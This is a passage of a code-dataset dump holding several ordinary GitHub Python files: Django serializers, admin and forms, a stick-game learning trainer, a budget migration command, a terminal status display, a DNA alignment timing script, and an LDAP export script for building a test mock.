store_type_obj = super(StoreTypeSerializer, self).create(validated_data)\n store_type_obj.created_by = user.id\n store_type_obj.updated_by = user.id\n store_type_obj.save()\n return store_type_obj\n\n def update(self, instance, validated_data, user):\n validated_data = set_store_type_vaidated_data(validated_data)\n if StoreTypeTbl.objects.filter(name=validated_data['name'],tenant_id=validated_data['tenant_id'],\n utility_id=validated_data['utility_id']).exists():\n raise CustomAPIException(NAME_ALREADY_EXIST, status_code=status.HTTP_409_CONFLICT)\n else:\n with transaction.atomic():\n store_type_obj = super(StoreTypeSerializer, self).update(instance, validated_data)\n store_type_obj.updated_by = user.id\n store_type_obj.updated_date = datetime.utcnow()\n store_type_obj.save()\n return store_type_obj","repo_name":"bynryTechnologies/Neovibe-API","sub_path":"api/v1/store/serializers/store_type.py","file_name":"store_type.py","file_ext":"py","file_size_in_byte":3031,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"}
+{"seq_id":"72806521040","text":"#!/usr/bin/env python3\n\nfrom typing import List\n\nclass Solution:\n def longestConsecutive(self, nums: List[int]) -> int:\n max_count = 0\n\n s = set()\n for x in nums:\n s.add(x)\n\n for num in nums:\n if (num - 1) not in s:\n count = 0\n while (num + count) in s:\n count += 1\n max_count = max(max_count, count)\n\n return max_count\n","repo_name":"abhaysp95/cp_prac","sub_path":"neetcode/array_hashing/longest_consecutive_sequence.py","file_name":"longest_consecutive_sequence.py","file_ext":"py","file_size_in_byte":444,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"}
+{"seq_id":"17567255551","text":"from collections import defaultdict, Counter\nimport urllib.request\nimport numpy as np\nimport matplotlib.pyplot as plt\n#import pickle\nimport dill as pickle\nfrom tqdm import tqdm\nimport time\nimport math\nfrom scipy.stats import expon\nimport random\nimport sys\n#from tqdm import tqdm_notebook as tqdm\n\n\nclass Player:\n\n def __init__(self, player_number):\n self.player_number = player_number\n\n def initial_state(self, n):\n\n self.stick_count = defaultdict(lambda: defaultdict(int))\n self.stick_prob = defaultdict(lambda: defaultdict(float))\n\n for i in range(1, n + 1): # iterating over no. of sticks\n for j in range(1, 4):\n self.stick_count[i][j] = 3\n self.stick_prob[i][j] = 1 / 3\n\n # updating policy for winning\n def update_policy_winner(self):\n\n for k in self.stick_no.keys():\n self.stick_count[k][self.stick_no[k]] += 1\n for i in range(1, 4):\n self.stick_prob[k][i] = self.stick_count[k][i] / sum(self.stick_count[k].values())\n\n # updating policy for losing\n def update_policy_loser(self):\n\n for k in self.stick_no.keys():\n if sum(self.stick_count[k].values()) > 1 and self.stick_count[k][self.stick_no[k]] > 0:\n self.stick_count[k][self.stick_no[k]] -= 1\n for i in range(1, 4):\n self.stick_prob[k][i] = self.stick_count[k][i] / sum(self.stick_count[k].values())\n\n def save_policy(self):\n with open('policy_%s.bin' % ('first' if self.player_number == 1 else 'second'), 'wb') as f:\n pickle.dump(self.stick_prob, f)\n pickle.dump(self.stick_count, f)\n\n def load_policy(self):\n with open('policy_%s.bin' % ('first' if self.player_number == 1 else 'second'), 'rb') as f:\n self.stick_prob = pickle.load(f)\n self.stick_count = pickle.load(f)\n\n\nclass State:\n\n def __init__(self, n, player1, player2, N, epsilon=0.8):\n\n self.n = n\n self.sticks = n\n self.player1 = player1\n self.player2 = player2\n self.epsilon = epsilon\n self.N = N\n\n def reset_state(self):\n self.sticks = self.n\n self.player1.stick_no = {}\n self.player2.stick_no = {}\n\n def update_state(self, player, sim):\n\n keys = list(player.stick_prob[self.sticks].keys())\n values = list(player.stick_prob[self.sticks].values())\n\n if expon.pdf(sim / self.N, loc=0, scale=1) > self.epsilon and np.random.uniform(0, 1) > 0.5:\n\n rand_index_1 = np.random.choice(len(keys))\n player.stick_no[self.sticks] = keys[rand_index_1]\n\n else:\n rand_index_1 = np.random.choice(len(keys), 1, p=values)\n player.stick_no[self.sticks] = keys[rand_index_1[0]]\n self.sticks = self.sticks - player.stick_no[self.sticks]\n\n # checking the winner\n def check_winner(self, winner):\n\n if winner == 1:\n self.player1.update_policy_winner()\n self.player2.update_policy_loser()\n else:\n self.player2.update_policy_winner()\n self.player1.update_policy_loser()\n\n\ndef train(N, n):\n \"\"\"\n Train the bot to play a stick game by making two AI players to compete\n\n Parameters\n ----------\n N : no. of simulations\n n : no. 
of sticks\n\n Returns\n -------\n\n Trained AI players\n\n player1 : object\n player2 : object\n\n\n Examples\n --------\n train(50000,50)\n\n \"\"\"\n\n player1 = Player(1)\n player2 = Player(2)\n\n state = State(n, player1, player2, N, 0.8)\n\n player1.initial_state(n)\n player2.initial_state(n)\n\n for sim in tqdm(range(N)):\n # print (sim)\n\n state.reset_state()\n\n while True:\n\n if state.sticks > 0:\n state.update_state(player1, sim)\n # print (state.sticks)\n else:\n winner = 1\n # print (\"Player 1 Wins\")\n break\n\n if state.sticks > 0:\n state.update_state(player2, sim)\n else:\n winner = 2\n # print (\"Player 2 Wins\")\n break\n\n state.check_winner(winner)\n\n player1.save_policy()\n player2.save_policy()\n\n time.sleep(0.01)\n\n\n\nif __name__ == '__main__':\n train(50000,50)\n\n","repo_name":"amank90/stick_game","sub_path":"src/train_stick_game.py","file_name":"train_stick_game.py","file_ext":"py","file_size_in_byte":4312,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"}
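# --- Illustrative sketch (added; not part of the original record). ---
# The exploration gate above compares expon.pdf(sim / N) with epsilon;
# since expon.pdf(t) = exp(-t) for t >= 0, random moves stop being
# considered once sim / N exceeds -ln(0.8) ~= 0.223:
import math
from scipy.stats import expon

N, epsilon = 50000, 0.8
print(int(-math.log(epsilon) * N))  # ~11157 simulations stay exploratory
print(expon.pdf(0.5) > epsilon)     # False: exp(-0.5) ~ 0.607, greedy regime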
+{"seq_id":"14886065214","text":"import logging\n\nfrom django.core.management import call_command\nfrom django.core.management.base import BaseCommand\nfrom django.db.models import Q, Sum\n\nfrom budgetweb.apps.structure.models import PlanFinancement\nfrom budgetweb.models import Depense, PeriodeBudget, Recette\n\n\ncommands_logger = logging.getLogger('import_commands')\n\n\nclass Command(BaseCommand):\n help = 'Check if the StructureMontant objects are correct'\n\n def add_arguments(self, parser):\n parser.add_argument('year', nargs=1, metavar='YEAR', type=int)\n\n def create_depenses(self, pfi, *args, **kwargs):\n year = kwargs.pop('year', None)\n extra_values = kwargs.pop('extra_values', [])\n values = ['naturecomptabledepense', 'domainefonctionnel'] + extra_values\n depenses = pfi.depense_set\\\n .filter(*args, **kwargs)\\\n .values(*values)\\\n .annotate(Sum('montant_ae'), Sum('montant_cp'), Sum('montant_dc'))\n\n depenses_list = [\n Depense(\n pfi=pfi,\n periodebudget=self.period,\n annee=year or depense['annee'],\n naturecomptabledepense_id=depense['naturecomptabledepense'],\n domainefonctionnel_id=depense['domainefonctionnel'],\n montant_ae=depense['montant_ae__sum'],\n montant_cp=depense['montant_cp__sum'],\n montant_dc=depense['montant_dc__sum'],\n creepar='Command migrate_pluriannuel',\n ) for depense in depenses\n ]\n return depenses_list\n\n def create_recettes(self, pfi, *args, **kwargs):\n year = kwargs.pop('year', None)\n extra_values = kwargs.pop('extra_values', [])\n values = ['naturecomptablerecette'] + extra_values\n recettes = pfi.recette_set\\\n .filter(*args, **kwargs)\\\n .values(*values)\\\n .annotate(Sum('montant_ar'), Sum('montant_re'), Sum('montant_dc'))\n\n recettes_list = [\n Recette(\n pfi=pfi,\n periodebudget=self.period,\n annee=year or recette['annee'],\n naturecomptablerecette_id=recette['naturecomptablerecette'],\n montant_ar=recette['montant_ar__sum'],\n montant_re=recette['montant_re__sum'],\n montant_dc=recette['montant_dc__sum'],\n creepar='Command migrate_pluriannuel',\n ) for recette in recettes\n ]\n return recettes_list\n\n def handle(self, *args, **options):\n verbosity = options.get('verbosity')\n\n for year in options.get('year'):\n try:\n self.period = PeriodeBudget.objects.get(\n annee=year, period__code='BI')\n except PeriodeBudget.DoesNotExist:\n raise Exception('Erreur : Période BI %s inexistante' % year)\n\n if self.period.has_entries():\n raise Exception('Erreur : Entrées déjà existantes pour la '\n 'période BI %s ' % year)\n\n pfis = PlanFinancement.objects.filter(is_pluriannuel=True)\n depenses = []\n recettes = []\n for pfi in pfis:\n # Budget antérieur\n depenses.extend(self.create_depenses(\n pfi,\n (Q(annee=year - 2) | Q(annee=year - 1)),\n year=year - 1, periodebudget__annee=year - 1))\n recettes.extend(self.create_recettes(\n pfi,\n (Q(annee=year - 2) | Q(annee=year - 1)),\n year=year - 1, periodebudget__annee=year - 1))\n\n # Budgets futurs\n depenses.extend(self.create_depenses(\n pfi, extra_values=['annee'], annee__gte=year,\n periodebudget__annee=year - 1))\n recettes.extend(self.create_recettes(\n pfi, extra_values=['annee'], annee__gte=year,\n periodebudget__annee=year - 1))\n\n # bulk_create is faster but it does not trigger the save method.\n # Therefore, this script needs to launch check_structuremontants\n Depense.objects.bulk_create(depenses)\n Recette.objects.bulk_create(recettes)\n\n check_structuremontants_parameters = filter(\n bool, ('-v %s' % verbosity,))\n\n call_command('check_structuremontants', '-u', '-y 
%s' % year,\n *check_structuremontants_parameters, stdout=self.stdout)\n\n commands_logger.info('Command migrate_pluriannuel launched with parameters : %s' % options)\n","repo_name":"unistra/budgetweb","sub_path":"budgetweb/management/commands/migrate_pluriannuel.py","file_name":"migrate_pluriannuel.py","file_ext":"py","file_size_in_byte":4636,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"3"}
+{"seq_id":"27069780083","text":"import os,sys\nimport subprocess\n\nclass TerminalTable:\n def __init__(self,conf):\n self.conf = conf\n self.mill_index = 0\n self.refresh_terminal_shape()\n self.col_names = [\"Run\",\"Type\",\"Status\",\"#Frames\",\"#Hits\",\"HRate\"]\n self.title = [\"# Cheetah queue status\",(\"-\"*self.shape[1]),\"\",(\"-\"*self.shape[1])]\n self.runs = {}\n self.set_message(\"Initializing...\")\n def set_message(self,message):\n self.message = [message]\n def note(self,message):\n self.message = [message]\n self.print_screen()\n def set_runs(self,runs):\n self.runs = runs\n self.print_screen()\n def _get_s_head(self):\n s_head = \"\"\n s_head += \"=\"*self.shape[0]+\"\\n\"\n s = \"CHEETAH RUNNER\"\n l = self.shape[0]-len(s)-4\n s_head += \"||\"+\" \"*(l/2)+s+\" \"*(l/2)+\"||\\n\"\n s_head += \"=\"*self.shape[0]+\"\\n\"\n width = self.shape[0]/56\n for w in range(width):\n for c in self.col_names:\n s_head += c + \"\\t\"\n s_head += \" || \"\n s_head = s_head[:-9] + \"\\n\"\n return s_head\n def _get_s_message(self):\n s_message = \"\"\n for m in self.message:\n s_message += m + \"\\n\"\n return s_message\n def _get_s_content(self):\n s_content = \"\"\n names = self.runs.keys()\n names.sort()\n length = self.shape[1]-8-self.Nlines_jobs-(self.Nlines_jobs>0)\n width = self.shape[0]/56\n #print length\n #print len(names)\n s_content_lines = [\"\"] * length\n for i in range(length*width):\n if i <= (len(names)-1):\n R = self.runs[names[-i-1]]\n s_content_lines[i%length] += names[-i-1] + \"\\t\"\n for c in self.col_names[1:]:\n s_content_lines[i%length] += R.attrs.get(c,\"-\") + \"\\t\"\n s_content_lines[i%length] += \" || \"\n else:\n s_content_lines[i%length] += (\"-\\t\"*len(self.col_names)) + \" || \"\n s_content = \"\"\n for i in range(length):\n s_content += s_content_lines[i][:-9] + \"\\n\"\n return s_content\n def _get_s_jobs(self):\n s_jobs = \"\"\n if os.path.expandvars(self.conf[\"general\"][\"job_manager\"]) == \"lsf\":\n c = [\"bjobs\"]\n elif os.path.expandvars(self.conf[\"general\"][\"job_manager\"]) == \"slurm\":\n c = [\"squeue\",os.path.expandvars(\"-u$USER\")]\n #print c\n p = subprocess.Popen(c,stdout=subprocess.PIPE)\n p.wait()\n lines = p.stdout.readlines()\n self.Nlines_jobs = len(lines)\n for l in lines:\n s_jobs += l\n return s_jobs\n def refresh_terminal_shape(self):\n rows, columns = os.popen('stty size', 'r').read().split()\n self.shape = (int(columns),int(rows))\n def clear_screen(self):\n sys.stdout.write(\"\\033[2J\") # clear screen and goes to position 0 \n sys.stdout.write(\"\\033[H\")\n sys.stdout.flush()\n def print_screen(self):\n self.refresh_terminal_shape()\n s_head = self._get_s_head()\n s_message = self._get_s_message()\n s_jobs = self._get_s_jobs()\n s_content = self._get_s_content()\n self.clear_screen()\n sys.stdout.write(s_head)\n sys.stdout.write(\"-\"*self.shape[0]+\"\\n\")\n sys.stdout.write(s_content)\n sys.stdout.write(\"-\"*self.shape[0]+\"\\n\")\n if self.Nlines_jobs > 0:\n sys.stdout.write(s_jobs)\n sys.stdout.write(\"-\"*self.shape[0]+\"\\n\")\n mill = [\"-\",\"\\\\\",\"|\",\"/\"][self.mill_index%4]\n self.mill_index += 1\n sys.stdout.write(mill + \" \" + s_message)\n sys.stdout.flush()\n \n\n","repo_name":"antonbarty/cheetah-2017","sub_path":"oldstuff/2015/examples/analysis-pipeline-max/terminal.py","file_name":"terminal.py","file_ext":"py","file_size_in_byte":3709,"program_lang":"python","lang":"en","doc_type":"code","stars":8,"dataset":"github-code","pt":"3"}
+{"seq_id":"144109321","text":"\"\"\"Django\"\"\"\nfrom django.contrib import admin\nfrom django.contrib.auth.admin import UserAdmin as BaseUserAdmin\n\"\"\"Models\"\"\"\nfrom users.models import Profile\nfrom django.contrib.auth.models import User\n\n\n\n\n# Register your models here.\n\n\n@admin.register(Profile) # registro la app en el admin\nclass ProfileAdmin(admin.ModelAdmin):\n list_display = ('pk', 'user', 'phone_number', 'website', 'picture')\n # nos lleva al detalle cuando apretamos sobre ellos\n list_display_links = ('pk', 'user',)\n # los hacemos editables, no deben estar en links\n list_editable = ('phone_number', 'website', 'picture')\n search_fields = ('user__username', 'user__email', 'user__first_name',\n 'user__last_name', 'phone_number') # campo de busqueda\n list_filter = ('user__is_active', 'user__is_staff',\n 'created', 'modified') # filtros\n\n fieldsets = ( # info mejor estructurada\n ('Profile', {\n 'fields': (('user', 'picture'),),\n }),\n ('Extra info', {\n 'fields': (\n ('website', 'phone_number'),\n ('biography')\n )\n }),\n ('Metadata', {\n 'fields': (('created', 'modified'),),\n })\n )\n\n readonly_fields = ('created', 'modified',) # campos que no puedo modificar, solo leer\n\n\nclass ProfileInline(admin.StackedInline):\n \"\"\"Profile in-line admin for users.\"\"\"\n\n model = Profile\n can_delete = False\n verbose_name_plural = 'profiles'\n\n\nclass UserAdmin(BaseUserAdmin):\n \"\"\"Add profile admin to base user admin.\"\"\"\n\n inlines = (ProfileInline,)\n list_display = (\n 'username',\n 'email',\n 'first_name',\n 'last_name',\n 'is_active',\n 'is_staff'\n )\n\n\nadmin.site.unregister(User)\nadmin.site.register(User, UserAdmin)\n","repo_name":"NahuelFrias/BloggramPython-Django","sub_path":"users/admin.py","file_name":"admin.py","file_ext":"py","file_size_in_byte":1823,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"}
+{"seq_id":"16674242716","text":"from django import forms\nfrom .models import Income,Expense\nfrom django.forms import ModelForm,NumberInput,Select,DateInput\n# import django.forms\nfrom .models import *\nimport datetime\n\n\nclass IncomeForm(ModelForm):\n    class Meta:\n        model = Income\n        fields = [\"amount\",\"date\",\"category\"]\n        choices = CATEGORY_INCOME\n        widgets = {\"amount\":NumberInput(attrs={'class':\"form-control\",'placeholder':'Input amount'}),\n                   \"date\":DateInput(attrs={\"class\":\"form-control\",'placeholder':'Input date'}),\n                   \"category\":Select(choices= choices, attrs={\"class\":\"form-control\",'placeholder':'Select category'})}\n\n\nclass ExpenceForm(ModelForm):\n    class Meta:\n        model = Expense\n        fields = [\"amount\",\"date\",\"category\"]\n        choices = CATEGORY_EXPENCE\n        widgets = {\"amount\":NumberInput(attrs={'class':\"form-control\",'placeholder':'Input amount'}),\n                   \"date\":DateInput(attrs={\"class\":\"form-control\",'placeholder':'Input date'}),\n                   \"category\":Select(choices= choices, attrs={\"class\":\"form-control\",'placeholder':'Select category'})}\n\n# ---------------------\nclass GetStatsForPeriod(forms.Form):\n    start_date = forms.DateField(widget = forms.SelectDateWidget(years=range(1980,2100)))\n    end_date = forms.DateField(widget = forms.SelectDateWidget(years=range(1980,2100)))\n","repo_name":"Ventriss40k/Finance-log-app-project","sub_path":"f_app/forms.py","file_name":"forms.py","file_ext":"py","file_size_in_byte":1317,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"}
+{"seq_id":"866196713","text":"import time\nimport matplotlib.pyplot as plt\nfrom scipy import stats\nimport numpy as np\n\n\nfileName = \"covid_DNA.fasta\"\n\ndef read_fasta(howMany = 2):\n # The first line in a FASTA record is the title line.\n # Examples:\n # >third sequence record\n # >gi|2765657|emb|Z78532.1|CCZ78532 C.californicum 5.8S rRNA gene\n # returns a list of sequences as tuples (name.)\n with open(fileName, 'r') as filePt:\n sequences = []\n fastas = filePt.read().split(\">\")\n fastas = fastas[1:]\n for i in range(0,howMany):\n seq = fastas[i].split(\"\\n\")\n seq_name = seq[0]\n fasta_seq = \"\".join(seq[1:])\n sequences.append((seq_name,fasta_seq))\n return sequences\n\n ##Calculates the time taken by each function call and generates graph\ndef timeProblems(DNAProblem, function, init=None, fit='exponential'):\n # problemList is a list of tuples [(size, arguments),...] ordered smallest to biggest\n # runs and times the function with each arguments a\n # generates a graph of run time as a function of problem size\n # fit may be 'exponential' then the time as a function of problem size is assumed\n # to of the form time = c * a^n and the function solves for c and a\n # where a is the base of the exponential function and c is a multiplicative factor\n # fit my be 'polynomial' then the time as a function of problem size is assumed\n # to of the form time = c * n ^ b and the function solves for c and b\n # where b is the power of n (the degree of the polynomial) and c is a multiplicative fac* tor\n timeLine = []\n values = []\n\n for (size, args) in DNAProblem:\n\n start_time = time.time()\n function(*args) # use the * to unpack the tuple into arguments to the function\n elapsed = (time.time() - start_time) * 1000.0\n if elapsed > 0.0:\n timeLine.append(elapsed)\n # print(elapsed)\n values.append(size)\n\n print(str(size) + \" Sequence Size complete\")\n ##Generating the plot between time taken by each function call with n as variable and n\n plt.plot(values, timeLine, 'g')\n plt.xlabel(\"Problem size\")\n plt.yscale('log')\n if fit == 'polynomial':\n plt.xscale('log')\n plt.ylabel(\"time in milliseconds\")\n plt.rcParams[\"figure.figsize\"] = [16, 9]\n plt.show()\n if fit == 'exponential': # fit a straight line to n and log time\n slope, intercept, _, _, _ = stats.linregress([values], [np.log(t) for t in timeLine])\n print(\"time = %.6f * %.3f ^ n\" % (np.exp(intercept), np.exp(slope)))\n elif fit == 'polynomial': # fit a straight line to log n and log time\n slope, intercept, _, _, _ = stats.linregress([np.log(v) for v in values], [np.log(t) for t in timeLine])\n print(\"time = %.6f * n ^ %.3f\" % (np.exp(intercept), slope))\n timems = (np.exp(intercept)) * (30000 ** slope)\n hours = (timems / 1000) / 60\n print(\"if n was 30,000 it would take : \" + str(timems) + \"milliseconds\")\n print(\"or \" + str(hours) + \" hours to run\")\n print(\"The time it takes to compute grows at a rate of n^2 because of\")\n print(\"the nested for loops in the matchDP. The 1st for loop is getting\")\n print(\"multiplied by itself in the 2nd for loop everytime the 2nd for loop iterates.\")\n print(\"side note, sometimes this program works and sometimes it doesn't, sometimes \")\n print(\"I can run the program with the sequences being 16,000 characters long, sometimes it\")\n print(\"crashes after 2000 character long sentences. I'm not sure if it is COLABS fault or\")\n print(\"if it is my code. 
COLAB tells me i ram out of RAM\")\n\nseq = read_fasta()\n(name0, seq0) = seq[0]\n(name1, seq1) = seq[1]\n\n\ndef matchR(A, B):\n # uses recursion to solve the string matching problem\n # mod the strings to put a blank in front so that n and m represent both\n # the number of characters in the string AND the index into the string\n n = len(A)\n m = len(B)\n A = '_' + A\n B = '_' + B\n return match(n, m, A, B, )\n\n\ndef match(n, m, A, B, depth=0):\n # one of the strings is empty\n # print(\"%s A = %s B= %s\" % (\" \" * depth, A[0:n], B[0:m]))\n if n == 0:\n sol = m\n elif m == 0:\n sol = n\n # three cases\n else:\n # print(matrixLookUp(A[n], B[m]))\n sol = max(match(n - 1, m, A, B, depth + 1) + matrixLookUp(\"_\", A[n]), # delete from A\n match(n, m - 1, A, B, depth + 1) + matrixLookUp(\"_\", B[m]), # delete from B\n match(n - 1, m - 1, A, B, depth + 1) + matrixLookUp(A[n], B[m])) # substitute (if 1 != 1 )\n # print(\"%s solution = %d\" % (\" \" * depth, sol))\n return sol\n\n\n# prints out the solution\ndef printAlign(A, B, cache):\n n = len(A)\n m = len(B)\n A = '_' + A\n B = '_' + B\n # alignment = traceback(n, m, A, B)\n alignment = traceBackDP(n, m, A, B, cache)\n alignment.reverse()\n for oneAlign in alignment:\n print(oneAlign)\n # print(\"____________________\")\n\n\ndef traceback(n, m, A, B):\n # n is in A, m is in B\n # base case\n # nothing to do, return empty\n if n == 0 and m == 0:\n print(cache[(n, m)])\n return []\n # no characters in A, so add a delete from A and continue\n if n == 0:\n # delete from A\n print(cache[(n, m)])\n return [\"%s - %s\" % ('_', B[m])] + traceback(n, m - 1, A, B)\n # no characters in B, so delete from B and continue\n if m == 0:\n # delete from B\n print(cache[(n, m)])\n return [\"%s - %s\" % (A[n], '_')] + traceback(n - 1, m, A, B)\n # Need to determine which alignment sub solution was used for the optimal solution\n sol = cache[(n, m)]\n # we know that sol must equal one of the sub solutions\n if sol == cache[(n - 1, m)] + matrixLookUp(\"_\", A[n]): # delete from B\n print(sol)\n return [\"%s - %s\" % (A[n], '_')] + traceback(n - 1, m, A, B)\n if sol == cache[(n, m - 1)] + matrixLookUp(\"_\", B[m]): # delete from A\n print(sol)\n return [\"%s - %s\" % ('_', B[m])] + traceback(n, m - 1, A, B)\n # must have matched the characters, check the characters\n if A[n] != B[m]: # substitution\n print(sol)\n return [\"%s x %s\" % (A[n], B[m])] + traceback(n - 1, m - 1, A, B)\n # exact match\n print(sol)\n return [\"%s = %s\" % (A[n], B[m])] + traceback(n - 1, m - 1, A, B)\n\n\ndef traceBackDP(n, m, A, B, cache):\n line = []\n # print(cache[(n,m)])\n\n while True:\n solution = cache[(n, m)]\n if n == 0 and m == 0:\n # print(\"n and m == 0\")\n # print(solution)\n return line\n\n elif n == 0:\n # line = line + [\"%s - %s\" % ('_', B[m])] #+ cache[(n, m-1)]\n # print(\"n==0\")\n m = m - 1\n # print(solution)\n\n\n elif m == 0:\n # line = line + [\"%s - %s\" % (A[n], '_')] #+ cache[(n-1, m)]\n print(\"m==0\")\n n = n - 1\n # print(solution)\n\n\n elif solution == cache[(n - 1, m)] + matrixLookUp(\"_\", A[n]): # delete from B\n # print(\"delete B\")\n line = line + [\"%s - %s\" % (A[n], '_')] # + cache[(n-1, m)]\n solution = cache[(n, m)]\n # print(solution)\n n = n - 1\n\n\n elif solution == cache[(n, m - 1)] + matrixLookUp(\"_\", B[n]): # delete from A\n # print(\"delete A\")\n line = line + [\"%s - %s\" % ('_', B[m])] # + cache[(n, m-1)]\n solution = cache[(n, m)]\n # print(solution)\n m = m - 1\n\n\n\n elif A[n] != B[m]: # substitution\n # print(\"doesnt 
equal\")\n            line = line + [\"%s x %s\" % (A[n], B[m])] # + cache[(n-1, m-1)]\n            solution = cache[(n, m)]\n            # print(solution)\n            n = n - 1\n            m = m - 1\n\n\n        elif A[n] == B[m]:\n            # print(\"equals\")\n            line = line + [\"%s = %s\" % (A[n], B[m])] # + cache[(n-1, m-1)]\n            solution = cache[(n, m)]\n            # print(solution)\n            n = n - 1\n            m = m - 1\n\n\n        else:\n            print(\"error\")\n            n = n - 1\n            m = m - 1\n    print(\"traceback complete\")\n    return line\n\n\ndef matchDP(A, B):\n    global cache\n    cache = {}\n    X = A\n    Y = B\n\n    n = len(A)\n    m = len(B)\n    # modify the strings to put a blank in front\n    A = '_' + A\n    B = '_' + B\n    # fill in the base cases\n    for i in range(0, n + 1):\n        cache[(0, i)] = i # matrixLookUp(\"_\",B[i])\n    for j in range(0, m + 1):\n        cache[(j, 0)] = j # matrixLookUp(\"_\", A[j])\n    # loop through all problems from smallest to biggest\n    # what about the 0 0 case?\n    cache[(0, 0)] = 0\n    for i in range(1, n + 1):\n        for j in range(1, m + 1):\n            # need to change the indexes into the array!\n            # so from n in recursion to j and from m in recursion to i\n            cache[(i, j)] = max(cache[(i - 1, j)] + matrixLookUp(\"_\", A[i - 1]),\n                                cache[(i, j - 1)] + matrixLookUp(\"_\", B[j - 1]),\n                                cache[(i - 1, j - 1)] + matrixLookUp(A[i - 1], B[j - 1]))\n    return cache[(n, m)]\n\n\n# looks up the number associated with the letters\ndef matrixLookUp(x, y):\n    # if the letter being looked up isn't A,C,G,T (or the gap \"_\"),\n    # change it to T\n    if x not in (\"A\", \"C\", \"G\", \"T\", \"_\"):\n        x = \"T\"\n    if y not in (\"A\", \"C\", \"G\", \"T\", \"_\"):\n        y = \"T\"\n\n    if x == \"A\" and y == \"A\":\n        return 5\n    if x == \"A\" and y == \"C\":\n        return -1\n    if x == \"A\" and y == \"G\":\n        return -2\n    if x == \"A\" and y == \"T\":\n        return -1\n\n    if x == \"C\" and y == \"A\":\n        return -1\n    if x == \"C\" and y == \"C\":\n        return 5\n    if x == \"C\" and y == \"G\":\n        return -3\n    if x == \"C\" and y == \"T\":\n        return -2\n\n    if x == \"G\" and y == \"A\":\n        return -2\n    if x == \"G\" and y == \"C\":\n        return -3\n    if x == \"G\" and y == \"G\":\n        return 5\n    if x == \"G\" and y == \"T\":\n        return -2\n\n    if x == \"T\" and y == \"A\":\n        return -1\n    if x == \"T\" and y == \"C\":\n        return -2\n    if x == \"T\" and y == \"G\":\n        return -2\n    if x == \"T\" and y == \"T\":\n        return 5\n\n    if x == \"_\" and y == \"A\":\n        return -3\n    if x == \"_\" and y == \"C\":\n        return -4\n    if x == \"_\" and y == \"G\":\n        return -2\n    if x == \"_\" and y == \"T\":\n        return -1\n\n    else:\n        print(\"ERROR: \" + x + \" \" + y + \" other than provided letters found\")\n\n#TEST correctness of code\nA = 'ACGGAGAGAATC'\nB = 'TGGAGAGAATTC'\n\n\nA = 'GAA'\nB = 'GAC'\n\n\n#match to fill in the cache\n#edit = matchDP(A,B)\n#matchDP(A,B)\n#edit = matchR(A, B)\n#printAlign(A, B, cache)\n#print(edit)\n\ndef generateProblemsDNA(start, end):\n    return [(i, (list1[:i], list2[:i])) for i in problemSizes]\n\n# TEST THE TIMING OF THE CODE\nglobal cache\ninputList = read_fasta(2)\n# size = 10000\nlist1 = seq0\nlist2 = seq1\nproblemSizes = [2**i for i in range(5, 14)]\nDNAProblem = [(i, (list1[:i], list2[:i])) for i in problemSizes]\n\n#since we expect the DP algorithm to be polynomial\ntimeProblems(DNAProblem, matchDP, fit = 'polynomial')\nprintAlign(list1[:16384], list2[:16384], cache)","repo_name":"BrodyLarsenUSU/DNAMatching","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":11351,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"}
+{"seq_id":"17488720914","text":"\"\"\"\nexport_ldap.py\n\nUse this script to export the info from the LDAP server.\n\nMove the outputs of the script to the fixtures directory to run them with the ldap test suite.\n\nhttps://ldap3.readthedocs.io/mocking.html#a-complete-example\n\"\"\"\nimport json\n\nfrom ldap3 import ALL, ALL_ATTRIBUTES, MOCK_SYNC, Connection, Server\n\nINFO_OUTPUT = \"csua_ldap_info.json\"\nSCHEMA_OUTPUT = \"csua_ldap_schema.json\"\nENTRIES_OUTPUT = \"csua_ldap_entries.json\"\n\nif __name__ == \"__main__\":\n REAL_SERVER = \"ldaps://ldap.csua.berkeley.edu\"\n\n # Retrieve server info and schema from a real server\n server = Server(REAL_SERVER, get_info=ALL)\n connection = Connection(server, auto_bind=True)\n\n # Store server info and schema to json files\n server.info.to_file(INFO_OUTPUT)\n server.schema.to_file(SCHEMA_OUTPUT)\n\n # Read entries from a portion of the DIT from real server and store them in a json file\n if connection.search(\n \"dc=csua,dc=berkeley,dc=edu\", \"(objectclass=*)\", attributes=ALL_ATTRIBUTES\n ):\n raw_entries = connection.response_to_json(raw=True)\n entries = json.loads(raw_entries)\n filtered_entries = {\n \"entries\": [\n i\n for i in entries[\"entries\"]\n if \"posixAccount\" not in i[\"attributes\"][\"objectClass\"]\n # don't add the accounts\n ]\n }\n with open(ENTRIES_OUTPUT, \"w\") as f:\n json.dump(filtered_entries, f, indent=2)\n else:\n raise RuntimeError(\"ldap search failed!\")\n\n # Close the connection to the real server\n connection.unbind()\n\n # Create a fake server from the info and schema json files\n fake_server = Server.from_definition(\"csua_mock\", INFO_OUTPUT, SCHEMA_OUTPUT)\n\n # Create a MockSyncStrategy connection to the fake server\n fake_connection = Connection(fake_server, client_strategy=MOCK_SYNC)\n\n # Populate the DIT of the fake server\n fake_connection.strategy.entries_from_json(ENTRIES_OUTPUT)\n\n # Add a fake user for Simple binding\n fake_connection.strategy.add_entry(\n \"cn=django_test_user,ou=People,dc=csua,dc=berkeley,dc=edu\",\n {\"uid\": \"django_test_user\", \"userPassword\": \"P4SSW0RD!\"},\n )\n\n # Bind to the fake server\n fake_connection.bind()\n","repo_name":"CSUA/csua-backend","sub_path":"apps/ldap/export_ldap.py","file_name":"export_ldap.py","file_ext":"py","file_size_in_byte":2269,"program_lang":"python","lang":"en","doc_type":"code","stars":19,"dataset":"github-code","pt":"3"}
